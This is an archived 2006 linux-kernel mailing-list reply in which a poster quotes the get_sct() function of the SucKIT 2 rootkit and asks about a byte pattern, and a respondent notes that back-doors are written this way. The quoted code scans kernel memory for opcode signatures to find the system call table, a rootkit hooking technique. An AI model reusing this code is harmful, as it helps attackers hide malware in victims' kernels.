Re: What means "\xc7\x44\x24\x18\xda\xff\xff\xff\xe8"

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 




In what file did you find this? This is how back-doors are written!

On Wed, 5 Apr 2006, openbsd shen wrote:

> this code from get_sct() of suckit 2, why memmem()
> "\xc7\x44\x24\x18\xda\xff\xff\xff\xe8"use, what it want to find?
> The get_sct() founction:
>
> ulong   get_sct()
> {
>        uchar   code[SCLEN+256];
>        uchar   *p, *pt;
>        ulong   r;
>        uchar   pt_off, pt_bit;
>        int     i;
>
>        kernel_old80 = get_ep();
>
>        if (!kernel_old80)
>                return 0;
>        if (rkm(code, sizeof(code), kernel_old80-4) <= 0)
>                return 0;
>
>        if (!memcmp(code, "PUNK", 4))
>                return 0;
>
>        p = (char *) memmem(code, SCLEN, "\xff\x14\x85", 3);
>        if (!p) return 0;
>
>        pt = (char *) memmem(p+7, SCLEN-(p-code)-7,
>                "\xc7\x44\x24\x18\xda\xff\xff\xff\xe8", 9);
>        /* when run at here , it always return 0 */
>        if (!pt) {
>                eprintf("pt = %s\n", pt);
>                return 0;
>        }
>
>        sc.trace = *((ulong *) (pt + 9));
>        sc.trace += kernel_old80 + (pt - code) - 4 + 9 + 4;
>
>        pt = (char *) memmem(p+7, SCLEN-(p-code)-7, "\xff\x14\x85", 3);
>        if (!pt) return 0;
>
>        for (i = 0; i < (p-code); i++) {
>                if ((code[i] == 0xf6) && (code[i+1] == 0x43) &&
>                    (code[i+4] == 0x75) && (code[i+2] < 127)) {
>                        pt_off = code[i+2];
>                        pt_bit = code[i+3];
>                        goto cc;
>                }
>        }
>
>        return 0;
> }
> -

Cheers,
Dick Johnson
Penguin : Linux version 2.6.15.4 on an i686 machine (5589.42 BogoMips).
Warning : 98.36% of all statistics are fiction, book release in April.
_


****************************************************************
The information transmitted in this message is confidential and may be privileged.  Any review, retransmission, dissemination, or other use of this information by persons or entities other than the intended recipient is prohibited.  If you are not the intended recipient, please notify Analogic Corporation immediately - by replying to this message or by sending an email to [email protected] - and destroy all copies of this information, including any attachments, without reading or disclosing them.

Thank you.
-
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to [email protected]
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Please read the FAQ at  http://www.tux.org/lkml/

[Index of Archives]     [Kernel Newbies]     [Netfilter]     [Bugtraq]     [Photo]     [Stuff]     [Gimp]     [Yosemite News]     [MIPS Linux]     [ARM Linux]     [Linux Security]     [Linux RAID]     [Video 4 Linux]     [Linux for the blind]     [Linux Resources]
  Powered by Linux